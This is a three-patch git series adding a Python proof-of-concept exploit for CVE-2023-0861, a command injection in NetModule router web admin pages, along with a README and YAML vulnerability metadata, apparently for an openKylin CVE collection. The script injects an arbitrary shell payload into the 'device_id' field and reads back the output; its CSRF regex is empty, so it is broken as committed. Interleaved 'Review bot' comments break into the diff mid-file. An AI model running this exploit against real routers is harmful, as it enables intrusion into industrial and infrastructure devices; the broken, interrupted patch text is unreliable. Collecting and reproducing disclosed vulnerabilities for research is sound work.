From dc567819a506aee9a292e2e248c7c80fbaea3082 Mon Sep 17 00:00:00 2001
From: Lisa_bo
Date: Fri, 7 Apr 2023 13:57:51 +0800
Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-08611?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../2023/CVE-2023-0861/PoC-CVE-2023-0861.py | 31 +++++++++++++++
 cve/NetModule/2023/CVE-2023-0861/README.md | 9 +++++
 cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 20 ++++++++++
 ...E-2022-23131.yaml => CVE-2022-23131.yaml} | 38 +++++++++----------
 openkylin_list.yaml | 2 +
 5 files changed, 81 insertions(+), 19 deletions(-)
 create mode 100644 cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
 create mode 100644 cve/NetModule/2023/CVE-2023-0861/README.md
 create mode 100644 cve/NetModule/2023/yaml/CVE-2023-0861.yaml
 rename cve/zabbix/2022/yaml/{CVE-2022-23131.yaml => CVE-2022-23131.yaml} (98%)
diff --git a/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
new file mode 100644
index 00000000..28a9172b
--- /dev/null
+++ b/cve/NetModule/2023/CVE-2023-0861/PoC-CVE-2023-0861.py
@@ -0,0 +1,31 @@
+import re
+import requests
+import argparse
+import urllib.parse
+
+
+parser = argparse.ArgumentParser(description='CVE-2023-0861 PoC')
+parser.add_argument('--url', type=str, required=True, help='URL of the vulnerable router')
+parser.add_argument('--phpsessid', type=str, required=True, help='Admin\'s PHP session ID for authentication')
+parser.add_argument('--payload', type=str, required=True, help='Command Injection Payload')
+args = parser.parse_args()
+
+url = f'{args.url}/admin/gnss.php'
+c = {'PHPSESSID':args.phpsessid}
+response = requests.get(url,cookies=c)
+csrf_token = re.search(r'', response.text).group(1)
+#print(csrf_token)
+data = {
+'toggleAlignment': 'test',
+'device_id': f'1; {args.payload} > /home/www-data/admin/img/nothing.png; 2',
+'csrf-token': csrf_token,
+}
+#print(f'1; {urllib.parse.unquote(args.payload)} > /home/www-data/admin/img/nothing.png 2')
+url = f'{args.url}/admin/gnssAutoAlign.php'
+
+response = requests.post(url, data=data,cookies=c)
+
+if response.status_code == 200:
+ results = requests.get(f'{args.url}/admin/img/nothing.png',cookies=c)
+ #print('done!')
+ print(results.content.decode())
\ No newline at end of file
diff --git a/cve/NetModule/2023/CVE-2023-0861/README.md b/cve/NetModule/2023/CVE-2023-0861/README.md
new file mode 100644
index 00000000..9024e8db
--- /dev/null
+++ b/cve/NetModule/2023/CVE-2023-0861/README.md
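Review bot: `csrf_token = re.search(r'', response.text).group(1)` cannot work as committed: the pattern is empty, so the match has no group 1 and `.group(1)` raises `IndexError` on every run, which suggests the real regex was lost when the file was pasted and has to be restored from the upstream PoC; the lookup should also be checked before use, e.g. `match = re.search(CSRF_TOKEN_PATTERN, response.text)  # placeholder: restore the pattern from the upstream source` followed by `if match is None: raise SystemExit('csrf-token not found; check --url and --phpsessid')`. Neither `requests.get` nor `requests.post` passes a `timeout=`, so an unresponsive host blocks the script indefinitely, and the status of the first GET is never checked (`response.raise_for_status()`), so an expired session silently hands a login page to the regex. `urllib.parse` is only referenced in a commented-out line and can be dropped. The one-space indentation under `if response.status_code == 200:` in this rendering may be an artifact of the collapsed hunk rather than the committed file; worth confirming it is four spaces in the repository.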
@@ -0,0 +1,9 @@
+### Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers
+
+NetModule is an Original Equipment Manufacturer (OEM) of industrial grade routers that are commonly used in critical
+infrastructure and industrial control systems. On February 24th, 2023, ONEKEY, a security research firm, released a security
+advisory disclosing a vulnerability that affect 9 NetModule routers. The vulnerability were identified within the web
+management interface and allow authenticated users to execute arbitrary commands with elevated privileges.
+As an individual interested in IoT security and firmware analysis, I find it valuable to review the entire reproduction process of
+reported vulnerabilities and In the pursuit of expanding my knowledge and skills, I took it upon myself to reproduce the
+disclosed vulnerability.
diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
new file mode 100644
index 00000000..f941a6ac
--- /dev/null
+++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-0861
+source: https://github.com/seifallahhomrani1/CVE-2023-0861-POC
+info:
+ name: ONetModule NSRW是NetModule公司的一系列路由器软件。NetModule NSRW存在安全漏洞,该漏洞源于执行由未经过滤的用户输入构建的操作系统命令,经过身份验证的攻击者利用该漏洞可以执行任意命令。
+ severity: HIGH
+ description: |
+ NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。
+ scope-of-influence:
+ OpenSSL 9.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-0861
+ - https://avd.aliyun.com/detail?id=AVD-2023-0861
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2023-0861
+ cwe-id: CWE-78
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023
\ No newline at end of file
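Review bot: `severity: HIGH` is upper-case while the sibling entry cve/zabbix/2022/yaml/CVE-2022-23131.yaml touched by this same series writes `severity: critical`; if whatever consumes these YAML files compares the field literally, the two entries will not be handled alike, so `severity: high` (or whichever case the schema expects) keeps them consistent. The `tags` field likewise follows a different scheme here (`cve2023`) than in the Zabbix entry (a Chinese vulnerability-class label), which is worth settling on one convention for. The file also ends without a trailing newline (`\ No newline at end of file`), which is harmless but adds noise to every later diff of this file.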
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
similarity index 98%
rename from cve/zabbix/2022/yaml/CVE-2022-23131.yaml
rename to cve/zabbix/2022/yaml/CVE-2022-23131.yaml
index 0eab256c..e3f384c6 100644
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
+id: CVE-2022-23131
+source:
+ https://github.com/L0ading-x/cve-2022-23131
+info:
+ name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+ severity: critical
+ description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+ scope-of-influence:
+ Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://www.secpulse.com/archives/179601.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-23131
+ cwe-id: CWE-290
+ cnvd-id: None
+ kve-id: None
 tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 7128c8a6..5b0bd01d 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -164,6 +164,8 @@ cve:
 - CVE-2021-43798
 Froxlor:
 - CVE-2023-0315
+ NetModule:
+ - CVE-2023-0861
 cnvd:
 apache-tomcat:
 - CNVD-2020-10487
-- 
Gitee
From 94c558e39173f26dcd3f2398e72390088ab1823f Mon Sep 17 00:00:00 2001
From: Lisa_bo
Date: Mon, 17 Apr 2023 16:01:59 +0800
Subject: [PATCH 2/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-0861?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
index f941a6ac..47989d00 100644
--- a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
+++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
@@ -6,7 +6,7 @@ info:
 description: |
 NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。
 scope-of-influence:
- OpenSSL 9.1
+ NSWR 4.3.0.0-4.3.0.119,4.4.0.0-4.4.0.118,4.6.0.0-4.6.0.105,4.7.0.0-4.7.0.103
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2023-0861
 - https://avd.aliyun.com/detail?id=AVD-2023-0861
@@ -14,7 +14,7 @@ info:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 8.8
 cve-id: CVE-2023-0861
- cwe-id: CWE-78
+ cwe-id: CWE-78,CWE-77
 cnvd-id: None
 kve-id: None
 tags: cve2023
\ No newline at end of file
-- 
Gitee
From 281df8d0dd34f0052245c0b6f5a682a1b1ee77c7 Mon Sep 17 00:00:00 2001
From: Lisa_bo
Date: Wed, 26 Apr 2023 14:11:02 +0800
Subject: [PATCH 3/3] =?UTF-8?q?=E6=8C=89=E8=A6=81=E6=B1=82=E4=BF=AE?=
 =?UTF-8?q?=E6=94=B9?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 cve/NetModule/2023/yaml/CVE-2023-0861.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
index 47989d00..7495f7ac 100644
--- a/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
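Review bot: The new `scope-of-influence` line in patch 2 names the product `NSWR`, while `name` and `description` in the same file call it `NSRW`, so one of the two is a typo; going by the rest of the file the line should read `NSRW 4.3.0.0-4.3.0.119, 4.4.0.0-4.4.0.118, 4.6.0.0-4.6.0.105, 4.7.0.0-4.7.0.103`. Spacing the ranges after the commas would also match the separator style the series later adopts for `cwe-id` (`CWE-78, CWE-77`). The enclosing `info:` mapping begins before this hunk.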
+++ b/cve/NetModule/2023/yaml/CVE-2023-0861.yaml
@@ -1,7 +1,7 @@
 id: CVE-2023-0861
 source: https://github.com/seifallahhomrani1/CVE-2023-0861-POC
 info:
- name: ONetModule NSRW是NetModule公司的一系列路由器软件。NetModule NSRW存在安全漏洞,该漏洞源于执行由未经过滤的用户输入构建的操作系统命令,经过身份验证的攻击者利用该漏洞可以执行任意命令。
+ name: ONetModule NSRW是NetModule公司的一系列路由器软件。
 severity: HIGH
 description: |
 NetModule NSRW Web 管理界面执行使用未经净化的用户输入构建的操作系统命令。成功利用此漏洞可允许经过身份验证的用户使用提升的权限执行任意命令。
@@ -14,7 +14,7 @@ info:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 8.8
 cve-id: CVE-2023-0861
- cwe-id: CWE-78,CWE-77
+ cwe-id: CWE-78, CWE-77
 cnvd-id: None
 kve-id: None
 tags: cve2023
\ No newline at end of file
-- 
Gitee
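Review bot: The shortened `name` still reads `ONetModule NSRW是NetModule公司的一系列路由器软件。`; the vendor is spelled `NetModule` in every other field of this file and in the file's own path, so the leading `O` looks like a typo and the line should be `name: NetModule NSRW是NetModule公司的一系列路由器软件。`. The same misspelling is present in the version of this field that patch 1 introduces, so fixing it here closes it for the whole series.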